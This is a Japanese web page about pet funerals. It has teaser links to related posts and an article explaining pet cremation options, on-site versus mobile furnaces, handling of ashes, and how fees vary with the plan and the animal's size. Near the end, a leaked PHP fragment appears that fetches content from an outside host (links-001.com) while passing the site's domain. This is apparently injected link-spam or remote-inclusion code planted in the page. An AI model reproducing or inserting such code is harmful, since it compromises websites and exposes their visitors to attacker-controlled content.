前へ
次へ

二度目は覚悟のうえで迎えたペット葬

先代の愛犬を送る際に初めてペット葬を体験したときは、何もかもが分からないことだらけでしたし、霊園もま

more

ペット葬を依頼する前に知っておきたい事

ペット葬を依頼する際に知っておいてもらいたい事があります。
それにはまず、料金があります。
小動物の場合

more

ペット葬と各自治体の火葬の違い

ペットが亡くなった時に遺体の対応をする必要がありますが、各自治体に届け出るかペット葬を行うのかを考え

more

ペット葬は人間の葬式よりもある意味多様化

ペット葬はその文字のごとくペットのための葬儀です。
ペットもいずれは死んでしまいますが、多くの人間の葬儀社ではペットのための葬儀プランを用意していないし、人間のための火葬場すら高齢化社会で受け入れ困難な状況が続いています。
そこでペット葬の会社ではペットのための葬儀に特化した設備投資を行っています。
具体的な設備投資の1つは火葬炉を独自に所有することです。
この火葬炉は建物内に設置する固定型と車に搭載している移動型の2種類に分けられます。
いずれにしてもその火葬炉は人間のサイズよりも小さくなっています。
というのはペットのサイズ自体が人間のサイズよりも小さいからです。
これにより火葬炉の建設費も運営コストも人間よりも安価に済ませることができます。
次に営業プランも人間よりも多様化しています。
そしていずれにしても人間よりもローコストなプランを提供しています。
ペットのための葬儀プランは人間と違って祭壇が豪華か否かで価格が変化するのではなく、火葬のやり方で変化してきます。
火葬のやり方では人間は霊きゅう車に乗せられて、火葬場まで搬送されてそこで火葬されますが、ペットの葬儀では葬儀社の建物内でやるか、依頼者の自宅近くまで車でやってきて、その車の火葬炉で処理されるかとなります。
その火葬炉の処理では人間と同じように依頼者の飼い主さんが火葬炉の前で見届けるやり方もある一方で、すべてを業者任せにしてしまうやり方もあります。
すべてを業者任せにすると人間のように火葬炉の前で見届ける場合に比べて安価な傾向となります。
しかも焼却された遺灰の処理も人間の場合は一部ないし全部をご遺族が骨拾いをするのに対して、ペットの場合は人間と同じように骨拾いできるプランと業者任せにしてしまうプランがあります。
しかも後者の場合は回収された遺灰などを依頼者のもとへ届けてくれる場合とすべてをゴミとして処理してもらう場合とに分かれるので、ここでも料金の差が発生してきます。
なお料金はペットのサイズ次第で変化し、大型になるほど高くなってきます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top